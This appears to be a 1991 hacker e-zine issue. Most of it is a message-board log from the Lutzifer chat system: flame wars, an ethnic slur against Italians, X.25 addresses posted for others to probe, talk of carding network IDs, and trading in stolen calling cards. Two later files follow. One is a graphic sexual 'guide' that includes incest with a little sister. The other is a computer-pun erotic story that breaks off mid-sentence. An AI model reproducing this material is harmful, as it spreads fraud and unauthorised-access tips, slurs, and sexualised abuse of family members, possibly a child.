Subject: HA!

Listen to tha, coming from a guy who doesn't know shit himself!
VM all you have to do is ask your friends and they will confirm that PAR is
in NASTY!
 (This, coming from a guy practically begging for IBM Warez!)
(Virtual Memory that is.)
/s

=========================

Message 281
From vmem at 06:41:48 on Sat Sep  7
Subject: Warez

Whattca do when your bored? Well, I play warez! I think their hella fun,
all the idiots who own the 'me' acnt, I know more than all of your punny
heads put together, all you do is talk shit, and write shit. But I guess
people like that we're beaten when they were children and now all they do
is try to impress others, in RL and VL (Real Life, and Virtual Life), because
they are afraid they might get their ass kicked...
     All of you are annoying putz'z
        Virtual/Memory
         NASTY's Menteor

=========================

Message 282
From lethal at 07:53:07 on Sat Sep  7
Subject: shit...

Geez, ya'll fuckers fill this base with warring.  Fucking lame as hell.  Looks l
ike a lame IBM Warez board.  Post some real info.

As for the Real hacker bit, hmmm, most hacers I know, don't evell boards...oh we
ll, war on fuck-ups...

=========================

Message 283
From jello at 09:35:56 on Sat Sep  7
Subject: Warez is good food.

What the hell? You nasty guys are so fucking anal, I'll pay for your
enemas that you all so desparetely need.

Warez should be respected. We should play them.
Codes are a necesity as well. If you don't need them, you must
either work for ma bell or have no long distance social life at all!

So, take a laxitive, play a ware, smoke a hooch, get your helmet shined.

                                                 The End.


=========================

Message 284
From cyclopz at 17:31:52 on Sat Sep  7
Subject: Nasty.

Right. Yer RIGHT jello. and Vmem. and Lethal. So to show them
How much Support they Have. Lets take Votes on wether or not they
shoulld EXIST. as a Group. Let me start off by voting
(NO!)
Try again in a few More years....Maybe then You'll Be Comparable
to Most of the People on QSD(Bah)
P.s. Nothing personal Dudez/...
CyClopz!...


=========================

Message 286
From blammo at 00:30:34 on Sun Sep  8
Subject: crap

this is such a crock of shit..what are people doing with puny "I'm more elite
than you" wars here? save it for a worthless BBS where there's nothing better to
 do
eh? I've talked with a few of the people who use 'me'..and until this crap I tho
ught
they had potential. to 'me'- whether you like it or not, vmem can hack better th
an
any of you.
i was going to babble more, but this is altogether too pointless, so fuck it.

=========================

Message 287
From lethal at 01:07:40 on Sun Sep  8
Subject: Hmmm...

Who the fuck cares if Vmen can hack better than us?  It not a fucking contest yo
u idiot.  But oh well, you'll find out someday...

=========================

Message 289
From jello at 06:00:32 on Sun Sep  8
Subject: Ok, but:

So vmem can hack better, but who can spooge further across
the room?


=========================

Message 290
From midas at 09:27:52 on Sun Sep  8
Subject: pathetic squabling

     Examine your behaiour
It seems to me that the hackworld and the streets of L.A are rather similar..
The existance of Virtual Gangs and their interaction will make an interesting st
udy someday.
Of course, it is only 'human' nature to assert ones dominance over all others..
But who wants to be human ?

     MMidas.

=========================

Message 291
From lethal at 05:29:07 on Mon Sep  9
Subject: janet

Here is alittle nua for you to mess with:  234223519191
Janet gateway thingie

Lethal...

=========================

Message 292
From tchhacky at 05:54:21 on Mon Sep  9
Subject: GOD'S

has anybody found a god over 9600 baud? Ive been looking but haven't found any.
OH well, back to warring. Anywayz, I just
got back from a hard week of fencing at my coach's house.
        Aurevoir,
                Tchhacky
.s

=========================

Message 293
From lethal at 12:18:17 on Mon Sep  9
Subject: GODs

Do they have 9600 baud GODs?

=========================

Message 294
From cyclopz at 22:13:34 on Tue Sep 10
Subject: T-Filez!

Someone!! Anyone!1 Mail me any/All t filez ya can get yer Hands Onm!
This is NOT an Order!(If it was would you listen? Nahhh) But a request!
Any T/Files/Tech Journals! I dont care WHO its By! Or what its Bout!
Just Send Em Send Em! Send Em!!!!!!! In care of
cyclopz DUH! heh Latez!
CyClopz!

=========================

Message 295
From cyclopz at 23:14:22 on Wed Sep 11
Subject: Password's

Thats NEAT! someone Got my passdword and Logged on while i was Off
Then i loigged on while he was on! WoW1! Thats Special! I mean to get
Caught like that Was Uncharacteristacilly SAD.....New PW
Try again on this one....
CyCLopz
.x

=========================

Message 296
From bandit at 00:42:34 on Thu Sep 12
Subject: Hmm....

e learning...
HMBandit

=========================

Message 297
From bandit at 00:46:22 on Thu Sep 12
Subject: shit...

Board warring and LA gangs have nothing in common... Dominance is
with savage apes... (interpet it with gangs at will...)  Though,
a group is a group.  If it's lame, then don't put out anything.
If you have something decent to say, then write a t-file...
Hackers are dieing, and it doesn't help any for the elder
                                                          hackers
to cut the new wavers.  This is why none of them are learning...
HMBandit

=========================
Message 298
From me at 00:52:58 on Sat Sep 14
Subject: nasty

do you think i really care who is better?? i never doubted vmem..

i think hes pretty cool.. but i have notthing to do wiwth the riddles
of nasty.. and you guys.. i dont even know why i call here?? well
its been a week or two so i just checkin up what renegade has done
to thjs account
 later on and peace,
                                        Code Of Honor

=========================
Message 299
From blammo at 05:33:29 on Sat Sep 14
Subject: Bandit..

Many hackers try to teach the so called 'new' hackers..but most of them don't
want to learn. Everyone and their brother calls QSD..and instantly they think
they're a hacker..and pull some "I'm elite" attitude. Most of them refuse to
admit they can learn something from someone. They sit around all day trading inf
o,
Yet they never use the info they trade. And they don't have a desire to learn.
This is the reason hackers just tell QSDers that call here to piss off. No one
wants to deal with some codes shit with an attitude who claims to be a hacker.
If someone comes here and says "I'm trying to learn <whatever>"..almost anyone
who knows it will be more than happy to help. Instead, people show up and say
"I'm elite and you're not!" and act like they run the world.

=========================

Message 300
From tchhacky at 00:12:13 on Sun Sep 15
Subject: LA.

well, the 213 area code of la is having its own problem with a group of board cr
ashers.
Whether there will be warring like here, I dont know, but something is brewing i
n the pot. later
tchhacky

=========================

Message 301
From cyclopz at 20:54:26 on Sun Sep 15
Subject: Nua's

Hey I know there'es Some NUA lists out there....could someone
post some Up here....or maybe the full list?!?? at the very least
Mail some ta me...
CyClopz!///


=========================

Message 302
From tanjian at 20:54:33 on Sun Sep 15
Subject: tutor

WANTED:  Help!
I truly WANT to learn.
Any suggestions?
                      -Tanj

=========================

Message 303
From blammo at 21:03:09 on Sun Sep 15
Subject: cyclopz

Full NUA list? If such a thing does exists by some freak accident, I don't
think any hackers have it. There was a decent sized list on tchh at some point,
but most of the addresses were either gone or hacked to hell..
I recommend you scan yourself, so you get `fresh' systems.

=========================

Message 304
From heartz at 01:07:19 on Mon Sep 16
Subject: re: NUA list

  Yes, I also recommend scanning for yourself or with a # of close
friends.  But, iof you want to take a look, there have been a number
printed in the lod/h tech journals, and a couple in phrack.

  h.

=========================

Message 305
From phantom at 23:12:14 on Mon Sep 16
Subject: NUIs

How to you guys get your NUIs for tymnet, i takes bloody forever to hack 'em out
 and the ones floating around don't last long, so whats the best way to get them
?

=========================

Message 306
From blammo at 00:19:38 on Tue Sep 17
Subject: NUIs

Card one..or just be lazy like me and wait until someone else does.

=========================

Message 307
From blammo at 02:30:06 on Tue Sep 17
Subject: accounts

I like my account..I think you should reconsider, Lutz. No one will call here
if you delete the accounts and require people to mail in for new accounts. I
don't see any problems whatsoever with the current system..so there's no reason
for what you're doing.

=========================

Message 308
From owsley at 06:02:58 on Tue Sep 17
Subject: cyclopz..

I have a list of outdial NUA's... fairly complete/updated.  Maybe some people he
re can collaborate and make one big list... that would be pretty cool..

....Owsley..

=========================

Message 309
From kaleidox at 12:23:09 on Tue Sep 17
Subject: NUIs from Hades

How do you card a NUI from Tymnet?


=========================

Message 310
From bandit at 15:46:34 on Tue Sep 17
Subject: Re:  NUI's...

I never realized that, that you could card them... I would suppose it
would be easier... Ok, how much to they check on the card?  Like call
back?  Hmm, what ever happened to pad?
HMBandit

=========================

Message 311
From bliss at 17:21:51 on Tue Sep 17
Subject: accounts

Yeah, its true, theres been no problems lately, and no one is going to
be sending in their real stuff for an account, and they wont want to
call in as guests forever.  Just leave it as it is.


=========================

Message 312
From ronnie at 20:59:48 on Tue Sep 17
Subject: blah!

well.. lets see here.. I, for one, can always get on IRC and talk to
anyone i want to anyway so it doesnt really amtter to me that  much
I would like to keep my account  on here..  but i'm  not going to

send any of my  personal  info to keep the account as I am sure about
879 other users on  this system  feel eh?  i mean.. only  a TOTAL
idiot who is really despirate would send in their real   information
to a ssystem that is based  with  hacker ethics..  thats
rediculous...
                    I have spoken:
                                ronnie  : epeoples@usmcp6.bitnet


=========================
Message 313
From mayhem at 22:30:16 on Tue Sep 17
Subject: CALLING CARDZ



 I am looking for a supply of virgin AT&T or other international
calling cards. I'll repay you to the best of my ability.

 -mayhem-

=========================

Message 314
From orpheus at 23:17:24 on Tue Sep 17
Subject: ,

sumthin happened 2 tymnet/micro and no more idiots
can kall out. bout time.

=========================

Message 315
From blammo at 06:57:46 on Wed Sep 18
Subject: Blah

Don't speak so soon..it's back.
I wish it would die..keep all the QSD scum off here. Hah..they can't even
reply to this..but who'd admit to being QSD scum anyway.
I think we need a new chat. With the recent QSD scum infestation, and the
account dying in 2 weeks...

=========================

Message 316
From fener at 20:33:59 on Wed Sep 18
Subject: Uhm.

I think QSD is shit coz of all thos fucking italians
F.

=========================

Message 317
From danhackr at 23:07:36 on Wed Sep 18
Subject: Re:Uhm.

Where are you from, Fener? :-)

=========================

Message 318
From fener at 15:26:36 on Thu Sep 19
Subject: Here!

Even, close to you, Danhackr!
F.
Why?
F.

=========================

Message 319
From danhackr at 20:34:08 on Thu Sep 19
Subject: Re:Here!

It was only to state that unfortunately a lot of italians are fuckin',
but being italian doesn't make indispensably fuckin', as you know.

=========================

Message 320
From feoh at 22:49:24 on Thu Sep 19
Subject: any1 send in their letter to lutz yet?

I'll bet alot of ppl are gonna get their accounts zapped :)

=========================

Message 321
From tchhacky at 01:50:31 on Fri Sep 20
Subject: whoa

I wonder if gandalf ever put a limit to this bullet? Or if he did where is it ca
use it takes up alot of room to just have a ton of messages.Time goes by too qui
ckly.

=========================

Message 322
From fener at 02:04:12 on Fri Sep 20
Subject: Ah, ok.

Ah, beh, but thats evident, Danhackr...
F.

=========================

Message 323
From me at 02:07:43 on Fri Sep 20
Subject: XENITH

can some one send me email with the # to the NSA XENITH PlEASE..
or mail it to my bbs.. s'il vous plait..

lateron.. ill give you something for the miserable thinbg

=========================

Message 324
From me at 01:49:34 on Mon Sep 23
Subject: XENIX

That message was posted by Code Of Honor... Anyway 'NASTY's' UNIX will be going
public soon. (2-3 lines, Internet mail, and shell access), but there will be a s
mall charge of $4.00 a month. (Also has USENET)

=========================

Message 325
From lazer at 21:56:31 on Mon Sep 23
Subject: BBS

What is the number to your BBS?
Try calling these other chat systems:
RMI 26245241090832
Altaghr 26245890040004

=========================

Message 326
From scratch at 00:30:13 on Tue Sep 24
Subject: ACCNTS

Yo,
     JUst a message to put in my protest about lutz wiping alll
the accounts, why dont you just wipe all the old un-used ones
and any that show any little sihn of causing trouble
There is little point in wiping any others

If you do go ahead and wipe them it will be your own loss the
mail on the system is an essentail part of it and by wiping
peoples accnts they will only leave this system and find somewhere
else where they can chat and leave mail so lutz for your
own sake if no ones elses lesave things basicclly as they are

Everyone else who agrees with this please just spend 2 minutes
of your time to write a quick note just to say 'yeah i agree with
that ' if nothing else, you cant expect to see things left
alo
   ne if you wont tell putz what you think
so write that message NOW


Scratch

=========================
Message 327
From spirit at 16:24:14 on Tue Sep 24
Subject: policy


  Yep, Scratch, I have to agree with you, this policy is utter bollox.
You are also correct in that people with accounts ARE NOT responsible for
any trouble here, and in fact, the guests are.  I don't think that really
matters though-- Lutz can't really expect to solve a problem that isn't
there.  He must have some other motives for wanting our real names and
numbers.

So.

=========================

Message 328
From bigj at 18:47:03 on Tue Sep 24
Subject: Accounts

	The accounts on this system should stay as is.  I am sure Lutz knows
that there is in fact an excess number of accounts on this system.  He could
end alot of his worries by getting rid of alot of the unused accounts, the
system would be more organized, and easier to manage.

        I also don't believe that Lutz's reasons for Lutzifers users to send in
real names and address's is justifiable.  For what valid reason does Lutz seek
such information?  Surely a trouble maker on Lutzifer would use a guest account
when starting friction, and if one were to use a legit account under this new
policy, the names and address's would not do Lutz one bit of good.....for what
does he plan to do.....extradite us?

        I think we all can agree that far to many computers have enough
information on us already....its ridiculous.  I can't even get my oil changed
without filling out my name, address, and phone number.....everything has gone
to damn bureacratic.

        If Lutz's proposed plan does go through, I can only say that the users
of Lutzifer have no more credibility then they had before, and that Lutz has
gained nothing.
                 This idea is among the most simplistic forms of bookeeping I
have yet to see.  Anyone can use any name.  Lutz has no way of checking this,
against the address or anything else for that matter.  So part one of the plan
already is a total and absolute falisy.  With a little effort, anyone can
aquire a P.O. Box, Suite, etc. for which the account info can be mailed to and
from.....it's just a matter of who is actually willing to go through all that
trouble?  Not I.

        The few people that do go along, and send in there names, etc.  will
more than likely be among the most devious and mischief causing of all.
Because they actually would go through the trouble to provide bogus information
so that they can cause trouble here, while at the same time logging on under
real accounts, a semingly different person.  On the flip side, anyone who is
moderatly intelligent, understands the danger sending a real name and address
poses, and will just say good-bye to Lutzifer......Lutzifer loses its best
people.

        Lutz,

            - You DO have a problem with troublemakers on your system.
            - You DO need a solution.
            - What you plan to do is NOT the right solution.



					   Signal_Interrupt


=========================
Message 329
From kaleidox at 01:52:34 on Wed Sep 25
Subject: Access

I agree with what appears to be a general concensus about access to
this system. Providing real information via postal mail is nothing
but pure silliness. Who would/will? This is obvious. I propose that
there really *are* ulterior motives behind this change in policy.
When is the last time anyone caused a disturbance, and was it or
was it not a guest account? There are plenty of other systems to
occupy...I sorta like this one, but I won't loose too much sleep
over it's loss.


=========================

Message 330
From bliss at 23:03:53 on Wed Sep 25
Subject: Accounts lossage

since it looks like there will be a string of these maybe Lutz will
listen.  Maybe, you have a problem, but I havnt heard anything RECENTLY
about NEW porblems.  All I know of is the old ones.  They were mostly
with the guest accounts anyways.  Even if users DID call back after no
more accounts (which is imminent with what your saying) there would
be even more problems, probably many people pretending their other
people making it truly pathetic to try to talk here.  Not much more
to say but "Lutz if you like running this system dont pull the
accounts.  You might as well just kill your NUA."

 -Bliss

=========================

Message 332
From orpheus at 04:21:57 on Thu Sep 26
Subject: lutz!

lets face it. lutz is a narc. hes gonna sell the names/addresses
to the highest bidder just like the chat logs.
muahahh!!!!

=========================

Message 333
From demon at 06:14:35 on Thu Sep 26
Subject: calling cards

about those cards, welp contact ghost or midnite and they will/should know
how to reach me.  I have a large supply of cards avalible and growing.


=========================

Message 334
From voleur at 08:00:58 on Thu Sep 26
Subject: access

I agree with all of the above mentioned letters...
(sorry I dont have the time write now to make my
reply an essay) BUT YES
THIS SYSTEM SHOULD REMAIN OPEN IF POSSIBLE!

=========================

Message 335
From blammo at 00:50:42 on Fri Sep 27
Subject: accnts

I think if anything, guest accounts should be removed. Guests are the only ones
who cause problems. I don't mean to say ALL guests cause problems, some are
fine. But almost ALL PROBLEMS are caused by guests. It's worth sacrificing the
extra guest callers in order to clean up the trouble (if any truly exists..)

=========================

Message 336
From kaleidox at 02:02:39 on Fri Sep 27
Subject: accnts

...which, as of late, it does not.


=========================

Message 337
From orpheus at 04:07:24 on Fri Sep 27
Subject: accts/problem

actually the WHOLLE problem is that damn nui. there were no problems
during the time between those nuis.. dyna and micro...

=========================

Message 338
From bliss at 08:17:56 on Fri Sep 27
Subject: problem/QSD

a lot of the shits now is from QSD.  There arnt many problems and
the only ones I can see are those lamers from QSD.
Can I have a code please?  Im callling direct from my house to Luzt
because theres a problem with micro...
Its fucking pathetic.
NUKE MICRO

  - Bliss

=========================

Message 339
From me at 02:30:04 on Sat Sep 28
Subject: lets be frank

why call here anyway?... im sick of seeing these complaints this guy,
lutz aint payin attention, and is what he is.. but these messages
are getting boring , more and more everyday...

                                @code of honor

=========================

Message 340
From bandit at 04:22:57 on Sat Sep 28
Subject: re: me...

why call here anyway?  It is still up, isn't it?  If someone said that
he was going to take your home away in a month, would you move out
right away?
HMBandit

=========================

Message 341
From me at 05:28:00 on Sat Sep 28
Subject: yeah

i guess you could really compare my house to me calling lutzifer
yep ok whatever... what do you bonus out of calling here anyways?
i dont even know why icall here sometimes..

                                        @Code Of Honor!

=========================

Message 342
From bliss at 17:51:44 on Sat Sep 28
Subject: to me

If you dont want to call here, then dont fucking call here.  Yeah it is
lame, the least lutz could do is just say "I dont care what you say
Im going to do it anyways"  but he doesnt say shit.  Ill keep calling untill
my accounts gone though, and IM sure most other people will also.

 -Bliss

=========================

Message 343
From kaleidox at 19:36:39 on Sat Sep 28
Subject: Posting

Yea...what the fuck. Two more days left...what system will
everyone be calling then? If 2624549004004 had a bullet
it'd be cool...


=========================

Message 344
From spirit at 22:29:55 on Sat Sep 28
Subject: Internet

If anyone needs to stay in touch with me, you can mail me at
spirit@shake.tamu.edu (legit)

I know I will be on inet mostly, you may catch me on irc.

So.

=========================

Message 346
From scooter at 07:02:20 on Sun Sep 29
Subject: Global ODs

I'm looking for a working 2400 Global Outdial other than 617 26A which
is always busy, so, any help would be appreciated, just mail me here

scooter
/s

=========================

Message 347
From boy at 17:42:34 on Sun Sep 29
Subject: QSD and Italians

QSD is not full of Italians, as you say.
Indeed is full of Americans, Israelians and so on... you can see it
every night. Still with so-kitsch and childish fashion of contemning
Italians...?
Bye.


(Message posted on Amadeus' request)

=========================

Message 348
From tango at 22:02:18 on Sun Sep 29
Subject: global

hi...can u post the golbal that u have.
im looking for one.
thanks!

=========================

Message 350
From fener at 00:50:58 on Mon Sep 30
Subject: Yeah..

Yeah, coz italians arent that much good.
Its not childish siang this but its simply the TRUTH.
And amadeus cud post his messages by him self.
F.

=========================

Message 351
From burntkid at 01:18:51 on Mon Sep 30
Subject: hahaha

Yo Code of Honor u Can consider my house more like lutz or qsd witht he phone li
nes and shit
l8r

=========================

Message 352
From demon at 04:36:34 on Mon Sep 30
Subject: mmail

whats the deal with the mmail here?!?
says I have new mail and then nothing happens
when I enter mmail.

=========================

Message 353
From lux at 04:49:32 on Mon Sep 30
Subject: Italians and lamers

Not all the Italians are created equal.
Indeed, seems that people complaining about them ARE.

lxu
ops,

lux

=========================

Message 354
From heartz at 09:26:15 on Mon Sep 30
Subject: endings1

  Greetings,. perhaps for the last time on lutzifer, but just the
sam, hello.  To those who had accounts, mainly to communicate with
others, October 1st, 1991 is to be a sad day, because of the trouble
of few, many must suffer.

  With the approach of October 1st close behind us, we wonder who will
be left to carry on.  I'm sure that few, if any, have
sent in the required information.  This shows that some of us still
have values, ethics, for we know what we are, and will ever be.  This
day looms over us like a cloak of night.  It is sad to see so many
people shut out.

  Trapped into calling places far from the grasp of reality, but
what is reality in CyberSpace?  No need to answer.  The ability to
leave messages, mail, to talk, and be heard.  Today, like another
long ago, where limitation of accounts would come to locals and guests.

  tchh relived.

[End of Part I]

=========================

Message 355
From heartz at 09:36:21 on Mon Sep 30
Subject: endings2

  For one word, 'deletion', can mean so much to so very many.  One
can only think of what caused this tradegy.  I will not mention it,
because we know of it.  For those left, those with the soon-to-be
rare account here or on the other Altos chat systems, today is like
another day to you.

  But think of all the others that will be missed.  Those who were
your friends, or just a long distance connection through CyberSpace,
and those who were not.

  CyberSpace, that connection that's not really there, hoping to be,
may never be again.  I will miss lutzifer, as I did for many other
chats such as tchh and earlier, but there is nothing I can say that
would bring it back; I wish it wasn't so.

[End of Part II]

=========================

Message 356
From heartz at 09:50:57 on Mon Sep 30
Subject: ending3

  But I am sure that lutz is set in his narrow-minded ways, what will
it prove?  Nothing.  His ethics towards others have been shown in the
past, the logging of accounts is truely a wrongful and blasphemous act
that can surely be seen through the fibers of CyberSpace.  What can
be said about a man who sacrafices his users to get rid of a problem
mainly dealing with guests and troublemakers who steal accounts from
others in the same sort of 'profession'?  Whose side is he on?
I believe the path is clear; move on.

  The conenction is gone, the link has become unlinked.  It is those
who used lutzifer as a communications hub that I feel sorry for.
Those who troth to the pursuit of systems unknown, systems
discovered, and systems penetrated.  Not by name, but by game.

  Those subdued, and those triumphant.  Those who made their
nomadic trek through CyberSpace to see the ever-so-cheerful...

Welcome to lutzifer

  That was home, that was what we strived to achieve.  Through
networks, through systems, throughout life.

  All I can say is, remember the past, live for the future.
To one and to all, CyberSpace mourns.

  heartz.
  09/30/91

=========================

Message 357
From lazer at 18:43:43 on Mon Sep 30
Subject: CyberSpace

I too must aggree with Heartz. That was very poetic. We will all come
together again on another chat system, no matter where it may be.
There are others out there, that are just waiting for us to move in
to them. So as we say goodbye to Lutz we can say hello to Altgerr
perhaps or even another system.
I will see you all there.

Lazer
9/30/91

=========================

Message 358
From owsley at 20:34:08 on Mon Sep 30
Subject: lutz...

Yes, it is a sad goodbye, and I wish I could match the poetry of heartz..
But there will be another system... possibly altger or something, that will
match if not surpass this system.. they are out there.  We just have to find the
m.

So to all of you, I bid farewell on this meeting place, as it is time to move on
 to another.

=========================

Message 359
From orpheus at 20:37:04 on Mon Sep 30
Subject: dont fret

hey interchat died but it didnt mean we died aalong with it!
we'll just find another chat! but until then...
bye bye everyone!
orpheus
9/30/91

=========================

Message 360
From phantom at 21:15:47 on Mon Sep 30
Subject: goodbye cruel world

well, this is it, soon no more lutz.  but like it's been said
we'll all move somewhere else, maybe pegusus, but it's kinda slow.
well, this is Phantom Phreak syaing vale


=========================

Message 361
From zaphod at 23:09:18 on Mon Sep 30
Subject: New x.25 chat/Phreak/Hack BBS in Germany

yo d00ds!

I will be setting up a new x.25 BBS next week or so...

It should have a more advanced  message/bulletin base,
'though just 2 lines.

But it will be FREE of course :)

It features also Internet Mail / Mailaddresses...

There will be a SLIP Internet Connection at sometimes, featuring IRC.


I am sorry, but it won't be a public, but more like a private elite sys.
If you want an account, just send a mail to
zaphod@lutzifer.uucp (on THIS box)
sec@gnu.ai.mit.edu (Internet)

the NUA will also start like 0262454000...
I will announce it when I set it up.

So keep on dreaming of a new BBS :-)

zaphod

=========================

Message 362
From zaphod at 23:13:22 on Mon Sep 30
Subject: I forgot: Account procedings

Well, if you want an acct on this BBS, send email to
sec@gnu.ai.mit.edu or
zaphod@lutzifer.uucp (from this system)

But you should also include in your Mail
why I should give YOU an account :-)
What your special abilities are...
If I know you, or if you belong to special hack groups

If you are female, just send a uuencoded Gif to me :-)

Of course I don't need your real name and address, you
MAY include it though,
but your age, first name, computer sys and interests would
be interesting.
Also what you could contribute to this BBS, since I need
supporting people :-)

ok, c ya
zaphod

=========================

Message 363
From blammo at 23:28:05 on Mon Sep 30
Subject: hmm

Not like it hasn't all been said..but, adios.

=========================

Message 364
From spirit at 23:46:27 on Mon Sep 30
Subject: Long Division


Brilliantly put, Heartz.

  I would just like to use my last day with this account to say bye to all
the people I will not meet again.  It is not likely I will see many of
you again ever -- I do not buy this 'great chat system in the sky' bollox.
It's been fun.  Time to move on.

Crack and Divide
Crack to Survive

So.

=========================

Message 365
From kaleidox at 00:36:05 on Tue Oct  1
Subject: bye

Yep. Bye all, it's been a blast.


=========================

Message 366
From heartz at 03:11:15 on Tue Oct  1
Subject: thank you

for the praise, I will honor it, but I'm sure we'll still
see each other, and hey!  My account still works, godda love it heh.

  h.

=========================

Message 368
From kaleidox at 22:53:35 on Tue Oct  1
Subject: We're Here...

Hmmm...so is the floor going to fall out any second, are we
here on borrowed time, or is Lutz perhaps reconsidering
his decision to boot us?

If we're gone soon then happy Halloween everyone, drop one
and think of interchat...:)



=========================

Message 369
From blammo at 00:03:50 on Wed Oct  2
Subject: Hark,

Hmm..we're still alive..tick..tick..tick.

=========================

Message 370
From cparker at 18:06:44 on Wed Oct  2
Subject: NASTY Journal Release 3

Would you please supply me a copy of Journal #3.  My username on
this board is CPARKER.  If you also have copies of #1 and #2 I'd
also like to see those.  Christine

=========================

Message 371
From demon at 03:26:59 on Fri Oct  4
Subject: my mailbox

yo lutz, mind fixing my mailbox for me?!?

=========================

Message 372
From orpheus at 20:32:51 on Fri Oct  4
Subject: fuck

shit!
this system i hacked out and used their pad i just logged in and seen th
is message
hello orpheus
this is the dataapac  cops -we're onto you
the FBI should arrive any time now...
better start running and hiding
talk to you in france
when does your bbs open up

some one  mind telling me who wrote this? i know its not legit
only me and one other person have the nua. hmm
this is fucked.

=========================

Message 373
From zaphod at 11:39:26 on Sat Oct  5
Subject: Countdown for new BBS running....

Yo d00ds and gals!

The countdown for my new BBS is running...
I just got the x.25 Software today :-)

I still need some good chat (perhaps i take IRC)
and most of all Message-Base System (nn?)...

ens of course some users, so APPLY today for your membership
of the new BBS in Lutzifer's Hometown:

SECTEC.

it has an internet name of course, sectec.hanse.de ...
featuring internet mail.

Send me mail applying for an acct, with:
age, first name, city, hacking abilities, contributional oofer to this bbs,
hobbies, ... :-)

If you are *really* female you could als mail a gif uuencoded or tell me
something about you.. :-)

it will be open at first just for testing, and not tooo long, so please
APPLY NOW!

btw, it has an x.25 NUA, a modem v32bis dialup and sometimes  a SLIP Inet Link.

=========================

Message 374
From blammo at 09:40:08 on Sun Oct  6
Subject: orph

Probably that 'one other person' trying to bug you out..

=========================

Message 375
From fener at 11:51:59 on Sun Oct  6
Subject: Zaphod.

What is ur boards x25 nua?

=========================

Message 376
From orpheus at 17:31:47 on Sun Oct  6
Subject: blammo

no it wuznt cuz i already asked him. sum1 else did it.i dunno who.

=========================


_________
Phile 14:
~~~~~~~~~
                        :~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~:
                        :  How to fuck stuffed animals  :
                        : by iNVALiD MEDiA -- 9/22/91 :
                        :        //Haliphax\\           :
                        : dedicated to all the assholes :
                        : who gave me a fuck'n hard ass :
                        : time in the BBS world. To all :
                        : of you assholes, FUCK YOU!    :
                         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-=> Preface <=-

This is a simple file on how to fuck stuffed animals! Its a a Saturday night
and your cousin isn't anywhere around. Your sister is at a friend's house,
you don't have a gerbil and your mom is out at a formal dinner party. It may
seem that things just aren't going your way. Nothing to do. You already wore
our your disk drive and licked your mom's old panties and tampons. What do
you do? Its STUFFED ANiMAL TiME!

-=> Dedication <=-

This is to all the assholes who persecuated me, dissed me, fucked with me
while I was trying to move up in the bbs world. The assholes who knocked me
off their boards, those who ripped on me, etc. You know who you are. Most of
you are so ELiTE that you're not around anymore.

-=> Materials Needed <=-

1) Stuffed animal with legs (a doll maybe!)
2) A dick (may be hard for some of you (use superglue and a broomstick if
   this is not available)
3) A bad case of lonliness
4) A vibrator (for added fun)
5) Jar or piss
6) Vaseline

-=> Step by Step Guide <=-

Ok take the teddy bare and put it in this position :

O|-|   (notice the spead legs?)

Take the knife and make a hold big enough for your dick/broom stick or the
vibrator to fit in. When you're done, make a long tunnel. Stick in the
vibrator and start working the animal. Oh Oh Oh how sexy. When you're hard
(it shouldn't take long for you), stick in your dick. Pour the piss all over
the newly formed pussy hole. Start going in and out in and out in and out.
Work the animal up the ass! in and out in and out... ya get it? You start to
cum. This is where a family relative comes in handle. Have your sister lick
your ass while you lick the shit thats dripping down the stuffed animal's
furry leg. Now make the animal sit on your face and totally eat 'em out...
really start eating him. AAAHHHH YUMMY you say? Stick your tongue up the hole
and drink whats there. Never had a sexual experience like this before? I
didn't think so! Have all the fun you want and be sure to use some vaseline.

Take the knife and make a hold in the teddy's mouth. Put some vaseline all
over and inside his mouth. Stick your dick in and cum in his mouth. Look
little sister, your brother is getting a blow job from your teddy bear!
Let the cum drip all over teddy's body. Not let your sister spread it around
and then lick it all up. Not jam your dick in the teddy's hold and proceed
to fuck your sister like this :

------|\   ->     <- Teddy
------|/   ->     <- Bear!


 \   |
--  \--- O
--  /---     -> sister's cunt
 /   |
 Teddy on
 your dick

Go in and out. Have fun with this! Take the teddy bear out and start
licking it all off! Do this all you want! Have phun!

This has been an iNVALiD MEDiA production!
---------
Phile 15:
---------

        This is the story of the HEX life of a fellow named Micro.
        
                Micro was a real-time operator and a dedicated multi-
        user. His broad-band protocol made it easy for him to interface 
        with numerous input/output devices, and even enjoyed time-sharing.
        
	     One evening he arrived at home just as the Sun was crashing,
        and as he parked his Motorola 68040 in the main drive, he noticed
        a cute little number admiring the daisy wheels in his garden. 
        "She looks user friendly," he thought, and decided to see if she
        would like an update tonite. Mini was her name, and she was 
        delightfully engineered with eyes like COBOL and a PRIME main-
        frame architecture that set Micro's peripherals networking all 
        over the place.
        
             He browsed over to her casually, admiring the power of her 
        twin, 32-bit floating point processors and enquired, "How are you
        Honeywell?" "Yes, I am well," she responded, batting her optical
        fibers engagingly and smoothing her console over her curvilinear
        functions.
        
             Micro settled for a straight line approximation. "I'm stand-
        alone tonight," he said, "How about computing a vector to my base 
        address ? I'll output a byte to eat, and maybe we could get off-
        set later on." Mini ran a priority for .6 milliseconds then 
        transmitted 8K, "I've been dumped recently myself, and a new page
        is just what I need to refresh my disks.  I'll park my machine 
        cycle in your background and meet you inside."  She walked off, 
        leaving Micro admiring her solonoids and thinking, "Wow, what a 
        global variable, I wonder if she'd like my firmware?"
        
             They sat down at the process table to form feed on fiche 
        and chips, throwing the left arrows in the bit bucket. Mini was 
        in top of form and in two way chat mode,  she expanded on ambiguous
        arguments while Micro gave the occasional acknoledgements, al-
        though, in reality, he was analyzing the shortest and least 
        critical path to her entry point. He did'nt want to use the same
        old command line, and settled on the would_you_like_to_see_my_
        benchmark routine, but Mini was again one process ahead of him.
        
             Suddenly she was up and stripping off her parity bits and 
        software to reveal the full functionality of her operating system.
        "Lets get BASIC you RAM," she said.  Mirco was loaded by this 
        time, but his firmware had a processor of it's own and was in 
        danger of overflowing its output buffer, a hang-up that Micro had
        consulted his analyst about. "Core" was all he could say, so she 
        prepared to log him off.  Mini went down on his DEC, and after
        reminding her not to byte, he opened her divide files to reveal 
        her Data Set Ready.  She accesed his fully packed root device, 
        and he was just about to start pushing into her CPU stack when 
        she attempted an escape sequence.
	     "No, wait," she cried, "your not shielded !"
             "Reset, baby," he replied, "I've been debuged and virus scanned." 
             "But I hav'nt got my current loop enabled, and I can't support 
        a child process!" she protested.






             "Don't lock up" he said, "I'll generate an interrupt."
             "No, thats too error prone, and I can't abort because of my 
        design philosophy."
        
             But it was too late. Mirco was loged in by this stage, and
        could not be turned off. She watched his 3 1/2" floppy expand as
        he gave her a 5 1/4" hard drive, and she felt the power of his 
        200 watt power supply. She dug her voltage spike heels into his 
